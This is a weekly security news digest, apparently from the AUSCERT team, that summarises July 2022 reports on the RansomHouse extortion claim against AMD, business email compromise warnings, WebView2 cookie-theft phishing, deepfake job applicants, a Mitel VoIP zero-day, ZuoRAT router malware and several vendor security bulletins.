Author: Cyber Security Connect

Semiconductor manufacturer AMD is investigating a cyber attack after the RansomHouse gang claimed to have stolen 450GB of data from the company last year. RansomHouse, an extortion group, claims to have stolen 450GB of data from AMD, announcing on Telegram that they would be “selling the data for a well-known three-letter company that starts with the letter A”. The extortion group also added AMD to their data leak site, claiming to have stolen 450GB of data. According to Satnam Narang, senior staff research engineer at Tenable, there has been a renaissance of pure-play extortion groups in recent months.

ACSC warns Aussie businesses of tax-time email hacking campaigns
Date: 2022-07-28
Author: Cyber Security Connect

The Australian Cyber Security Centre (ACSC) is urging Aussies and Australian businesses to strengthen their email security practices to protect their private information and that of their customers in the lead-up to tax time. As tax time approaches, the ACSC is encouraging individuals, businesses and organisations to be alert to, and aware of, business email compromise (BEC) threats. BEC occurs when cyber criminals access email accounts aiming to steal sensitive and financial information, or commit fraud by impersonating employees or company email accounts to obtain money or data.

Clever phishing method bypasses MFA using Microsoft WebView2 apps
Date: 2022-07-26
Author: Bleeping Computer

A clever new phishing technique uses Microsoft Edge WebView2 applications to steal victims’ authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts. With the large number of data breaches, remote access trojan attacks and phishing campaigns, stolen login credentials have become abundant. However, the increasing adoption of multi-factor authentication (MFA) has made it difficult to use these stolen credentials unless the threat actor also has access to the target’s one-time MFA passcodes or security keys.

This co-worker does not exist: FBI warns of deepfakes interviewing for tech jobs
Date: 2022-07-29
Author: TechCrunch

A lot of people are worried about the prospect of competing with AI for their jobs, but this probably isn’t what they were expecting. The FBI has warned of an uptick in cases where “deepfakes” and stolen personal information are being used to apply for jobs in the U.S. — including faking video interviews. Don’t dust off the Voight-Kampff test just yet, though. The shift to remote work is great news for lots of people, but like any other change in methods and expectations it is also a fresh playground for scammers. Security standards are being updated, recruiters are adapting, and of course the labor market is wild enough that hiring companies and applicants both are trying to move faster than ever.

Attacker Targets RCE Bug in Mitel MiVoice VoIP Appliances
Date: 2022-07-29
Author: Cyware Hacker News

Cybercriminals have used a zero-day exploit on Linux-based Mitel MiVoice VoIP appliances. According to researchers, the exploit was used for gaining initial access in an attempted ransomware attack.

The zero-day abuse

A report from CrowdStrike disclosed that a zero-day RCE flaw (CVE-2022-29499) present in the Mitel Service Appliance component of MiVoice Connect was abused to obtain initial access to the network. Although the attack was stopped, the intrusion is suspected to be part of a ransomware attack.

Sophisticated ZuoRAT attack targets home workers
Date: 2022-07-30
Author: IT News

Security researchers have unearthed a sophisticated campaign that targets consumer-grade routers from multiple manufacturers in Europe and North America. The researchers at security vendor Lumen’s Black Lotus Labs spotted the ZuoRAT multi-stage remote access tool hijacking small business and residential routers from brands such as Cisco, ASUS, DrayTek and Netgear.

ESB-2022.3122 – Traffix SDC: CVSS (Max): 7.8
A Linux kernel vulnerability which affects Traffix SDC has been acknowledged by F5. Currently, no mitigation or patches are available.

ESB-2022.3172.2 – ALERT Tenable.sc: CVSS (Max): 9.8
Tenable has released Tenable.sc patch 202206.1 to address the vulnerabilities in Apache.

ESB-2022.3152 – Firefox ESR 91.11: CVSS (Max): None
Mozilla has updated Firefox ESR to 91.11 to address the security vulnerabilities.

ESB-2022.3157 – maven-shared-utils: CVSS (Max): 9.8
Debian has released new maven-shared-utils packages to address shell injection attacks.

Stay safe, stay patched and have a good weekend!

The AUSCERT team
